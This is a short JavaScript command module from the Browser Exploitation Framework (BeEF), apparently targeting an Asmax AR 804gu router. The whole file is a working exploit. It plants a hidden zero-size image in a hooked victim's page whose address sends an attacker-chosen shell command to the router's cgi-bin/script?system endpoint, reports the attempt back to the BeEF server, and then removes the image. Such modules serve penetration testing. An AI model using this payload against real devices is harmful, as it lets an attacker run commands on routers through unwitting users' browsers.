1
//
2
// Copyright (c) 2006-2026Wade Alcorn - [email protected]
3
// Browser Exploitation Framework (BeEF) - https://beefproject.com
4
// See the file 'doc/COPYING' for copying permission
5
//
6

7
beef.execute(function() {
8

9
	var gateway = '<%= @base %>'; 
10
	var path    = 'cgi-bin/script?system%20';
11
	var cmd     = '<%= @cmd %>';
12

13
	var img = new Image();
14
	img.setAttribute("style","visibility:hidden");
15
	img.setAttribute("width","0");
16
	img.setAttribute("height","0");
17
	img.id = 'asmax_ar804gu_<%= @command_id %>';
18
	img.src = gateway+path+cmd;
19
	document.body.appendChild(img);
20

21
	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
22

23
	cleanup = function() {
24
		document.body.removeChild(img);
25
	}
26
	setTimeout("cleanup()", 15000);
27

28
});
29

30

31